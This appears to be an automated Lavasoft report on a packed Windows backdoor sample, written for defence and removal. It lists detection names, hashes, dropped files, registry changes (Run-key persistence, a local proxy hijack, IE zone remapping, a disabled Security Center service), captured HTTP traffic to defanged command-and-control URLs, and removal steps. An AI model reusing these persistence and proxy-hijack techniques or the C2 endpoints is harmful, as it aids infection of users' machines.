Gen:Variant.Sirefef.642 (BitDefender), VirTool:Win32/Obfuscator.PS (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic.pak!cobra (VIPRE), BackDoor.Gbot.1589 (DrWeb), Gen:Variant.Sirefef.642 (B) (Emsisoft), Artemis!71C3ADD065E8 (McAfee), Trojan.Gen.2 (Symantec), Backdoor.Win32.Agent (Ikarus), Gen:Heur.Conjar.3 (FSecure), Downloader.Generic12.BRK (AVG), Win32:Konar-B [Trj] (Avast), TROJ_SPNR.0BEE12 (TrendMicro), Gen:Variant.Sirefef.642 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Ransom.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)Behaviour: Ransom, Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 71c3add065e8be550ba1d5834cf88851
SHA1: 66c294c5d1cbc1beb1934fa56e07256ce3be4cfc
SHA256: 94a7c82661a6ed5f403e1df78e956deec537e342392760493bb9bceff146f777
SSDeep: 12288:7NyWRiw6Ju8tF8uXirWgYEaJWgoXQQDYolKZG6SVT1ISJZKmBMwu fPAnmtcRWQj:hSu FJNgdglcHsSt94yamtcRWQgXh
Size: 980431 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-02-21 21:46:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316
The Backdoor injects its code into the following process(es):
3R2R.exe:1728
Explorer.EXE:1644
File activity
The process %original file name%.exe:356 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (0 bytes)
The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process 3R2R.exe:1728 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes)
%System%\config (28672 bytes)
The Backdoor deletes the following file(s):
%Program Files%\LP\4566\C.exe (0 bytes)
Registry activity
The process %original file name%.exe:356 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 E3 13 70 E4 F9 EF 3B 90 C8 E4 A9 ED 92 53 E5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"ic5.exe" = "niBluse"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"2 Gansta.exe" = "2 Gansta"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Ãâ€Ã¾ÃºÑƒÃ¼ÃµÃ½Ñ‚Ñ‹"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\àðñþчøù ÑÂтþû"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"3R2R.exe" = "3R2R"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\àðñþчøù ÑÂтþû"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp]
"Clive Barker - Books Of Blood 03.exe" = "Clive Barker - Books Of Blood 03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Üþø ôþúуüõýты"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe,"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process Clive Barker - Books Of Blood 03.exe:172 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 2E 7E 18 C1 A3 8E 8F 7A 23 46 40 8C 32 66 89"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 2 Gansta.exe:1372 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 39 40 93 EF DC 0E 1A 59 2D 3C 1B 9C 1F 47 7C"
The process 3R2R.exe:788 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 65 EF A6 31 8D 69 89 F8 2F 7E 06 DB 98 C4 26"
The process 3R2R.exe:204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 60 1F 43 29 C5 D4 3A 5F 91 A0 9C 32 A4 7D 2B"
The process 3R2R.exe:1728 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 03 00 00 00 14 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:55192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 15 F7 31 9E 2F 57 84 02 87 B7 06 CE 23 4A 10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "3"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"
The process B.tmp:328 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 F2 E2 0B E2 A0 11 E5 ED 2C 48 49 0D 3B 01 51"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\WinRAR]
"HWID" = "7B 38 43 43 36 35 45 31 46 2D 31 34 45 43 2D 34"
The process ic5.exe:316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D5 C0 ED 4E D9 0D 64 E5 C7 53 81 30 A7 D9 C9"
Dropped PE files
MD5 | File path |
---|---|
8950bca822967c72154e56665ba6f7f2 | c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\3R2R.exe |
f51eba4d54233cfc975dd5d5c4bff62f | c:\Documents and Settings\test\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe |
ba4818120b8c3c87a4437450f5968ea5 | c:\Program Files\LP\4566\B.tmp |
8950bca822967c72154e56665ba6f7f2 | c:\Program Files\LP\4566\C29.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:356
Clive Barker - Books Of Blood 03.exe:172
2 Gansta.exe:1372
3R2R.exe:788
3R2R.exe:204
B.tmp:328
ic5.exe:316 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
%System%\config\software.LOG (25600 bytes)
%Program Files%\LP\4566\B.tmp (102912 bytes)
%Program Files%\LP\4566\C29.exe (555008 bytes)
%Program Files%\LP\4566\C.exe (1389 bytes)
%System%\config\SOFTWARE (102400 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"C29.exe" = "%Program Files%\LP\4566\C29.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23458 | 23552 | 4.5133 | 2cec663f64ef38694dc96bb9f9cb766d |
.rdata | 28672 | 4496 | 4608 | 3.58909 | db16645055619c0cc73276ff5c3adb75 |
.data | 36864 | 3774424 | 1024 | 3.26654 | b9d0aa986d9e766521436f5ad38cd7c5 |
.ndata | 3813376 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 3846144 | 80464 | 80896 | 3.42872 | 73f86a6245a543a96f576f96c83cda08 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 15
88e9fc280f566e75b54ad356f19bc655
8d362f9ccc6926ac693a660a0af91558
5c2b08b64a1f09f9b988a8bc46a9e630
fcca222aa86ff5586b258e4580f8757e
0016eb10d89c1f2eb9db605eb3a5770e
b2f1f0fc8745c630fb810d6d26b57116
e89791dad855d0639b8c5c31e6fd005e
4b82f8d2fde575a88ca16e77cd0c4c8a
e9d9468da93f92772e13b83aa00b19c2
9a57f10967bea58fcb881af06488fdb9
d31927526523f51d6b3f2f925cd92b9f
3c617aa1780bc50e507331c1a02b19ac
3185a136400f3b49bfc84ac977657be3
a9e3cd512751f30e22028373237b9a27
2b067884974886daf24650507c0ea1c1
Network Activity
URLs
URL | IP |
---|---|
hxxp://classicbattletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM | 67.192.254.201 |
hxxp://rumperstumprs.com/logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 | 208.73.211.182 |
hxxp://rumperstumprs.com/logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://rumperstumprs.com/logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 | |
www.download.windowsupdate.com | 92.123.155.155 |
ourdatatransfers.com | 208.73.211.168 |
worldorderlive.com | 208.73.211.182 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /logo.png?tq=gL5HtzoYwLzEpUb5fU3HxcW2B/06EsazybMRtyFZ0umG8Ar0SsSA/gSoSEU=&pr=41 HTTP/1.0
Host: rumperstumprs.com
User-Agent: mozilla/2.0
Connection: close
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:55:27 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=Um-PUwFiC-Sjz-PPzH2yLY_DgD6QUDhFchc_PXE0SX41BrMEUsSCNVOIex7BjqqNPGA0EMuVENcd1pL0Qr-p_40CWzjMc9NAHQcK-Gy4kkQXE2dCUaGhmDA5ApZONHkNNTE2LhDKiVM8oXMzGgAamgYNmUQJkN5kgqYeMuonNfJTNWQAIJDer78AAOB_AQAAQIDbCgAAj8OAPllTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
GET /logo.png?tq=gKZEtzoYwLzEvUb5dQzRsrCqAvQlTca3l74EgC5OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=&pr=41 HTTP/1.0
Connection: close
Host: rumperstumprs.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=87
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.rumperstumprs.com; path=/; expires=Sun, 30-Mar-2014 01:56:03 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>rumperstumprs.com</title>. <meta name="keywords" content="rumperstumprs.com" />. <meta name="description" content="rumperstumprs.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A" name="rumperstumprs.com">. </frameset>. <noframes>..<body><a href="hXXp://rumperstumprs.com?epl=ksIUvJD7ZzYeCCwMRaLwOIA0VBQ3JBROkdzFT08cTZJfjcEsgRSxYM0U4p5HsKNqIw8YDcx6CfP655aeaOwmxc9RiAuGKjnJ7DBYTLvlHZCglnoU4dQOitRZbKRBbB-VEjVDbt3NRKjTM2f3KaUBoKFp0JBJlDCSfoSJYKboUZNNNWQAIJDer78AAOB_AQAAQIDbCgAA0lBR3FlTJllBMTZoWkKbAAAA8A">Click here to go to rumperstumprs.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
GET /lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM HTTP/1.0
Connection: close
Host: classicbattletech.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Mar 2014 01:55:23 GMT
Server: Apache
Location: hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM
Content-Length: 629
Connection: close
Content-Type: text/html; charset=iso-8859-1
